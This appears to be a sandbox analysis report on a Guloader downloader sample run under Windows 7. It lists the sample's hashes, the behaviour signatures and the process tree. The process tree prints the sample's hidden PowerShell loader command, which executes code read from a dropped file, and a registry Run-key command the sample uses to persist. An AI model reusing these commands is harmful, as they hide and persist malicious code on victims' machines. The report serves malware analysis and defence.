Overview

overview

10

Static

static

10

01d63645f4...e3.exe

windows7-x64

9

01d63645f4...e3.exe

windows10-2004-x64

10

14bae02cc3...0e.exe

windows7-x64

10

14bae02cc3...0e.exe

windows10-2004-x64

8

TNT Origin...ce.exe

windows7-x64

10

TNT Origin...ce.exe

windows10-2004-x64

10

402ff605d7...97.exe

windows7-x64

10

402ff605d7...97.exe

windows10-2004-x64

10

4d0dfae91f...bf.exe

windows7-x64

7

4d0dfae91f...bf.exe

windows10-2004-x64

7

5401a3332d...8e.exe

windows7-x64

10

5401a3332d...8e.exe

windows10-2004-x64

10

Autoit3.exe

windows7-x64

3

Autoit3.exe

windows10-2004-x64

3

6cfe745f03...d2.exe

windows7-x64

10

6cfe745f03...d2.exe

windows10-2004-x64

10

90f19e1a78...ef.exe

windows7-x64

7

90f19e1a78...ef.exe

windows10-2004-x64

1

a3eeef65c4...4.xlsx

windows7-x64

1

a3eeef65c4...4.xlsx

windows10-2004-x64

1

a71829e150...e5.exe

windows7-x64

7

a71829e150...e5.exe

windows10-2004-x64

7

db58eb7713...c4.exe

windows7-x64

10

db58eb7713...c4.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    48s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    07-05-2024 14:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    14bae02cc31e4fb13f02aa594d65a977f1fdec305089c415985e11903769ae0e.exe

  • Size

    615KB

  • MD5

    174dcf32138060240e094f9faefecfc5

  • SHA1

    0b271c152cfda5ba57273967d8729f9cd755aa12

  • SHA256

    14bae02cc31e4fb13f02aa594d65a977f1fdec305089c415985e11903769ae0e

  • SHA512

    f63c8bae8020d359f61e7d09af25ae5cace4225fcaf492518ad64ce87886eb29aba27122a2dfbfe330d0b344e974215daf0f9e698cf2c2f621a804f5fa68874a

  • SSDEEP

    12288:/XWG6OT+LTOaWT9N4XhgggCwulapByjZhO838sSuEloIkxFA:/XWsTmWT9N4xgghblapB2hz8sSuEoIz

Score
10/10
guloaderdownloaderexecutionpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\14bae02cc31e4fb13f02aa594d65a977f1fdec305089c415985e11903769ae0e.exe
    "C:\Users\Admin\AppData\Local\Temp\14bae02cc31e4fb13f02aa594d65a977f1fdec305089c415985e11903769ae0e.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Retstillingers=Get-Content 'C:\Users\Admin\AppData\Roaming\illuminatus\sadeltasker\jungermanniaceae\Upgather\Vektoriel.Eks';$Disengagering=$Retstillingers.SubString(32120,3);.$Disengagering($Retstillingers)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2412
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2712
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unfeathered187" /t REG_EXPAND_SZ /d "%Gisnes% -windowstyle minimized $Nikethamide105=(Get-ItemProperty -Path 'HKCU:\Bubber\').Svartider;%Gisnes% ($Nikethamide105)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:692
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unfeathered187" /t REG_EXPAND_SZ /d "%Gisnes% -windowstyle minimized $Nikethamide105=(Get-ItemProperty -Path 'HKCU:\Bubber\').Svartider;%Gisnes% ($Nikethamide105)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:1416

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      dda16d2082c42d5fff20ef3235f77b53

      SHA1

      5c914895f658e6cf998d32eae8efef5b668d3ec0

      SHA256

      70452ab34a56ea868b1d51f24f465805fcc4af073053bd408efd07e620266abc

      SHA512

      321c943dd9bb95cf6591e6d0c6240e6a1afe47ddaf227399146b172112e14d7339c44e24c10d66fa0d60e39831eff2f8692d83072384f7c25822d478ac401cc3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab41E2.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar42C4.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit

    • C:\Users\Admin\AppData\Roaming\illuminatus\sadeltasker\jungermanniaceae\Upgather\Vektoriel.Eks
      Filesize

      50KB

      MD5

      5333a87a8aa86ef14e3cefc2162de69e

      SHA1

      2dbb497de16ff8a4d855e53c33cb56d62b6dcd81

      SHA256

      4ce60f9464a4737ebc1ae2dd8b98653c410193a28896f1d1110fc0173a395d56

      SHA512

      d9ead59794ccc243cccb13d6c11aea90ea402451d38c012ffb10a41fa7ff35f3f24582ad34318dacbce5af7f1480c8a016fdba82efe77522e22181c534ee5221

      Download Submit

    • C:\Users\Admin\AppData\Roaming\illuminatus\sadeltasker\jungermanniaceae\Upgather\Vidensbankerne.Del
      Filesize

      307KB

      MD5

      f48812c568ca9e001c50273a63d8691e

      SHA1

      af156772b118550bad9821c4bc466f21f5aa1d83

      SHA256

      f9cd32e7402c6fa5a8d96299a9a810f7e65c7f2d42208459e79b0db098b35d6d

      SHA512

      d02cd72ff731488ee609900b2705b89b86c471f5ee3382b8ecda122e7d161cfc6f07a41131258486f6087d7b73a0b726ad2c50c54da17d32292d5984ea5d004a

      Download Submit

    • memory/1972-21-0x00000000740C1000-0x00000000740C2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1972-29-0x0000000006880000-0x0000000007E0A000-memory.dmp

      Filesize

      21.5MB

      Download

    • memory/1972-25-0x00000000740C0000-0x000000007466B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1972-24-0x00000000740C0000-0x000000007466B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1972-23-0x00000000740C0000-0x000000007466B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1972-22-0x00000000740C0000-0x000000007466B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1972-125-0x00000000740C0000-0x000000007466B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2712-124-0x0000000001E50000-0x00000000033DA000-memory.dmp

      Filesize

      21.5MB

      Download